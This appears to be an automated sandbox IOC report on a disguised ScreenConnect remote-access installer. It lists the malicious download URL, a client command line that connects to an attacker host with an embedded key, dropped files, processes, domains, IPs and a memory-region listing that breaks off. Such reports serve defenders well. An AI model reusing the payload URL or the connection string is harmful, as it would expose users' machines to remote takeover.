IOC Report
https://cp9856.chelokipotlester.icu/Bin/support.Client.exe?h=cp3back96.site&p=8041&k=BgIAAACkAABSU0ExAAgAAAEAAQB9zMUOcnsRaC12buOM5jB%2F0aQdWfMpUKDaWi13yRXoM16W00nLl4p0ZtEhANoxvmcw0wWFEBncKj1h1Sizr06d2epn5Y1la%2FZuAUNQxVB6zV6MkV%2FQ3PQ8O4IKEUzM%2B1uTT6bVi8cjhVOM7wlYYJcudQAB6Dwlh4JaUc5YEBvhT8MaZnAIYPq

Files

File Path
Type
Category
Malicious
C:\ProgramData\Microsoft\Network\Downloader\edb.log
data
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
Extensible storage engine DataBase, version 0x620, checksum 0x28b44850, page size 16384, DirtyShutdown, Windows version 10.0
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
data
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8EC9B1D0ABBD7F98B401D425828828CE_BE4413523710330F97BEE5D4A544C42B
data
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141
data
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2E248BEDDBB2D85122423C41028BFD4
Certificate, Version=3
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157
data
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
data
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8EC9B1D0ABBD7F98B401D425828828CE_BE4413523710330F97BEE5D4A544C42B
data
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141
data
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2E248BEDDBB2D85122423C41028BFD4
data
dropped
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\manifests\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445.cdf-ms
data
dropped
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\manifests\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445.manifest
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (10074), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\manifests\scre..core_4b14c015c87c1ad8_0017.0009_none_65cb6507f0c2a5b9.cdf-ms
data
dropped
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\manifests\scre..core_4b14c015c87c1ad8_0017.0009_none_65cb6507f0c2a5b9.manifest
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\manifests\scre..dows_4b14c015c87c1ad8_0017.0009_none_6a433ce92d10b8e9.cdf-ms
data
dropped
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\manifests\scre..dows_4b14c015c87c1ad8_0017.0009_none_6a433ce92d10b8e9.manifest
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\manifests\scre..ient_4b14c015c87c1ad8_0017.0009_none_c7123e2bd9a688c6.cdf-ms
data
dropped
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\manifests\scre..ient_4b14c015c87c1ad8_0017.0009_none_c7123e2bd9a688c6.manifest
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\manifests\scre..ient_4b14c015c87c1ad8_0017.0009_none_fbe0c2da0011fbbd.cdf-ms
data
dropped
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\manifests\scre..ient_4b14c015c87c1ad8_0017.0009_none_fbe0c2da0011fbbd.manifest
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\manifests\scre..tion_25b0fbb6ef7eb094_0017.0009_none_4b563d129b766e28.cdf-ms
data
dropped
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\manifests\scre..tion_25b0fbb6ef7eb094_0017.0009_none_4b563d129b766e28.manifest
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (63847), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\manifests\scre..vice_4b14c015c87c1ad8_0017.0009_none_171efd5086820924.cdf-ms
data
dropped
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\manifests\scre..vice_4b14c015c87c1ad8_0017.0009_none_171efd5086820924.manifest
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445\ScreenConnect.ClientService.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445\ScreenConnect.WindowsBackstageShell.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445\ScreenConnect.WindowsBackstageShell.exe.config
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445\ScreenConnect.WindowsClient.exe.config
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445\ScreenConnect.WindowsFileManager.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445\ScreenConnect.WindowsFileManager.exe.config
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..core_4b14c015c87c1ad8_0017.0009_none_65cb6507f0c2a5b9\ScreenConnect.Core.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..dows_4b14c015c87c1ad8_0017.0009_none_6a433ce92d10b8e9\ScreenConnect.Windows.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..ient_4b14c015c87c1ad8_0017.0009_none_c7123e2bd9a688c6\ScreenConnect.WindowsClient.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..ient_4b14c015c87c1ad8_0017.0009_none_c7123e2bd9a688c6\ScreenConnect.WindowsClient.exe:Zone.Identifier
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..ient_4b14c015c87c1ad8_0017.0009_none_fbe0c2da0011fbbd\ScreenConnect.Client.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\4ta5r3hc.newcfg
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\Client.Override.en-US.resources
data
dropped
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\Client.Override.resources
data
dropped
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\Client.en-US.resources
data
dropped
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\Client.resources
data
dropped
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\app.config
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\user.config (copy)
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\web.config
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..vice_4b14c015c87c1ad8_0017.0009_none_171efd5086820924\ScreenConnect.ClientService.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\AN5UOLP8\C7EOHWRV.log
Unicode text, UTF-16, little-endian text, with very long lines (618), with CRLF line terminators
modified
C:\Users\user\AppData\Local\Temp\Deployment\NNEWXDXK.2NA\YR49AVEQ.H9P.application
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (63847), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.Client.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.Client.dll.genman
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.ClientService.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.ClientService.dll.genman
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.ClientService.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.Core.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.Core.dll.genman
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.Windows.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.Windows.dll.genman
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.WindowsBackstageShell.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.WindowsBackstageShell.exe.config
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.WindowsClient.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.WindowsClient.exe.config
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.WindowsClient.exe.genman
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.WindowsClient.exe.manifest
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (10074), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.WindowsClient.exe:Zone.Identifier
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.WindowsFileManager.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.WindowsFileManager.exe.config
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\932a2db58c237abd381d22df4c63a04a_9e146be9-c76a-4720-bcdb-53011b87bd06
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Oct 29 17:34:05 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Oct 29 17:34:05 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Oct 29 17:34:05 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Oct 29 17:34:05 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Oct 29 17:34:05 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
dropped
C:\Users\user\Downloads\Unconfirmed 974768.crdownload
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
C:\Users\user\Downloads\bfb7a509-8b20-4376-b9ba-bfeeb014e662.tmp
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
C:\Users\user\Downloads\support.Client.exe (copy)
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
JSON data
dropped
C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\MpCmdRun.log
Unicode text, UTF-16, little-endian text, with CRLF line terminators
modified
C:\Windows\System32\user.config
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
Chrome Cache Entry: 128
PE32 executable (GUI) Intel 80386, for MS Windows
downloaded

Processes

Path
Cmdline
Malicious
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
malicious
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p
malicious
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
malicious
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
malicious
C:\Windows\System32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup
malicious
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exe
"C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exe"
malicious
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exe
"C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=cp3back96.site&p=8041&s=5999b697-2fc8-47f6-a1dc-4d0d274c363e&k=BgIAAACkAABSU0ExAAgAAAEAAQB9zMUOcnsRaC12buOM5jB%2f0aQdWfMpUKDaWi13yRXoM16W00nLl4p0ZtEhANoxvmcw0wWFEBncKj1h1Sizr06d2epn5Y1la%2fZuAUNQxVB6zV6MkV%2fQ3PQ8O4IKEUzM%2b1uTT6bVi8cjhVOM7wlYYJcudQAB6Dwlh4JaUc5YEBvhT8MaZnAIYPqnbmxNwUw1RDlaRh5YJbZGPTJPIJpusdEO4D%2fCUtP6CZ%2f6LBYCi1k6apr4NFJdoCsgYMmz0ueWApW6fnSWePa0E3G6vxJQsjXUZXU7nn2pC9y84o5L0uqvKTZ239UPNomZv8wnSyaubzULL%2b48fuhT%2fYi9ukTBmorR&r=&i=Untitled%20Session" "1"
malicious
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exe
"C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=cp3back96.site&p=8041&s=5999b697-2fc8-47f6-a1dc-4d0d274c363e&k=BgIAAACkAABSU0ExAAgAAAEAAQB9zMUOcnsRaC12buOM5jB%2f0aQdWfMpUKDaWi13yRXoM16W00nLl4p0ZtEhANoxvmcw0wWFEBncKj1h1Sizr06d2epn5Y1la%2fZuAUNQxVB6zV6MkV%2fQ3PQ8O4IKEUzM%2b1uTT6bVi8cjhVOM7wlYYJcudQAB6Dwlh4JaUc5YEBvhT8MaZnAIYPqnbmxNwUw1RDlaRh5YJbZGPTJPIJpusdEO4D%2fCUtP6CZ%2f6LBYCi1k6apr4NFJdoCsgYMmz0ueWApW6fnSWePa0E3G6vxJQsjXUZXU7nn2pC9y84o5L0uqvKTZ239UPNomZv8wnSyaubzULL%2b48fuhT%2fYi9ukTBmorR&r=&i=Untitled%20Session" "1"
malicious
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exe
"C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exe" "RunRole" "286148cd-317c-42bd-b1b6-847f55f60348" "User"
malicious
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exe
"C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exe" "RunRole" "dab60135-edfb-4837-8e58-b67bfb3544e3" "System"
malicious
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2168 --field-trial-handle=1956,i,12778889090336067455,703406671093003371,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://cp9856.chelokipotlester.icu/Bin/support.Client.exe?h=cp3back96.site&p=8041&k=BgIAAACkAABSU0ExAAgAAAEAAQB9zMUOcnsRaC12buOM5jB%2F0aQdWfMpUKDaWi13yRXoM16W00nLl4p0ZtEhANoxvmcw0wWFEBncKj1h1Sizr06d2epn5Y1la%2FZuAUNQxVB6zV6MkV%2FQ3PQ8O4IKEUzM%2B1uTT6bVi8cjhVOM7wlYYJcudQAB6Dwlh4JaUc5YEBvhT8MaZnAIYPqnbmxNwUw1RDlaRh5YJbZGPTJPIJpusdEO4D%2FCUtP6CZ%2F6LBYCi1k6apr4NFJdoCsgYMmz0ueWApW6fnSWePa0E3G6vxJQsjXUZXU7nn2pC9y84o5L0uqvKTZ239UPNomZv8wnSyaubzULL%2B48fuhT%2FYi9ukTBmorR&s=5999b697-2fc8-47f6-a1dc-4d0d274c363e&i=Untitled%20Session&e=Support&y=Guest&r="
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5668 --field-trial-handle=1956,i,12778889090336067455,703406671093003371,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
C:\Windows\System32\SgrmBroker.exe
C:\Windows\system32\SgrmBroker.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3360 --field-trial-handle=1956,i,12778889090336067455,703406671093003371,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
C:\Users\user\Downloads\support.Client.exe
"C:\Users\user\Downloads\support.Client.exe"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
C:\Program Files\Windows Defender\MpCmdRun.exe
"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

URLs


Domains

Name | IP | Malicious
cp9856.chelokipotlester.icu | 37.221.67.19 | malicious
bg.microsoft.map.fastly.net | 199.232.210.172 |
www.google.com | 142.250.185.228 |
cp3back96.site | 37.221.67.19 |
fp2e7a.wpc.phicdn.net | 192.229.221.95 |

IPs

IP | Domain | Country | Malicious
37.221.67.19 | cp3back96.site | Russian Federation | malicious
142.250.185.228 | www.google.com | United States |
192.168.2.16 | unknown | unknown |
239.255.255.250 | unknown | Reserved |
127.0.0.1 | unknown | unknown |

Registry

Path
Value
Malicious

Memdumps

Base Address
Regiontype
Protect
Malicious
5400000
unkown
page readonly
267EA720000
heap
page read and write
D6E000
stack
page read and write
231E000
trusted library allocation
page read and write
4D5D000
stack
page read and write
1BAA0000
heap
page read and write
9AF01FE000
stack
page read and write
24F9465E000
heap
page read and write
7FFEB880B000
trusted library allocation
page execute and read and write
F43ABFE000
unkown
page readonly
212BBFB0000
heap
page read and write
227B9000000
trusted library allocation
page read and write
212BD520000
heap
page read and write
7FFEB884C000
trusted library allocation
page execute and read and write
1412000
trusted library allocation
page read and write
227B8E91000
heap
page read and write
13041000
trusted library allocation
page read and write
227BD150000
remote allocation
page read and write
9AEFCEC000
stack
page read and write
7FFEB87FD000
trusted library allocation
page execute and read and write
CF6307E000
unkown
page readonly
DE0000
heap
page read and write
212A15E0000
trusted library allocation
page read and write
107F000
stack
page read and write
7FFEB8A66000
trusted library allocation
page read and write
17F994A0000
heap
page read and write
212A348D000
trusted library allocation
page read and write
227B8391000
trusted library allocation
page read and write
7FFEB8AB0000
trusted library allocation
page read and write
7FFEB89E6000
trusted library allocation
page read and write
12FF000
heap
page read and write
9A0000
heap
page read and write
1B493000
heap
page read and write
CF6177E000
unkown
page readonly
32BE000
stack
page read and write
212BBFA0000
heap
page read and write
212A1A60000
heap
page read and write
CCF000
heap
page read and write
CF61A7E000
unkown
page readonly
227B7827000
heap
page read and write
7FFEB89B0000
trusted library allocation
page read and write
267EA900000
heap
page read and write
1740000
trusted library allocation
page read and write
7FFEB89D0000
trusted library allocation
page execute and read and write
CF61FFE000
stack
page read and write
1F8A5602000
trusted library allocation
page read and write
F43B4FE000
unkown
page readonly
24F94662000
heap
page read and write
1B410000
heap
page read and write
12A51000
trusted library allocation
page read and write
7FFEB8999000
trusted library allocation
page read and write
7FFEB8900000
trusted library allocation
page execute and read and write
A40000
heap
page read and write
1F8A4DC0000
trusted library allocation
page read and write
5C00000
heap
page read and write
7FFEB8A50000
trusted library allocation
page read and write
7FFEB8AF0000
trusted library allocation
page read and write
AFE000
heap
page read and write
7FFEB8B90000
trusted library allocation
page read and write
24F944F0000
heap
page read and write
1F8A4E13000
heap
page read and write
227B8EDB000
heap
page read and write
7FFEB8AD0000
trusted library allocation
page read and write
22170513000
heap
page read and write
7E0000
heap
page read and write
ABC000
heap
page read and write
212BD6C3000
heap
page read and write
5DFB000
stack
page read and write
EED000
stack
page read and write
CF6147C000
stack
page read and write
227B7883000
heap
page read and write
212A32B0000
trusted library allocation
page read and write
9CD41FE000
unkown
page readonly
1B429000
heap
page read and write
7FFEB8A90000
trusted library allocation
page read and write
24F946A0000
heap
page read and write
7FFEB8B40000
trusted library allocation
page read and write
7FFEB8BF0000
trusted library allocation
page execute and read and write
227B88E0000
trusted library allocation
page read and write
CF6227E000
unkown
page readonly
7FFEB87E3000
trusted library allocation
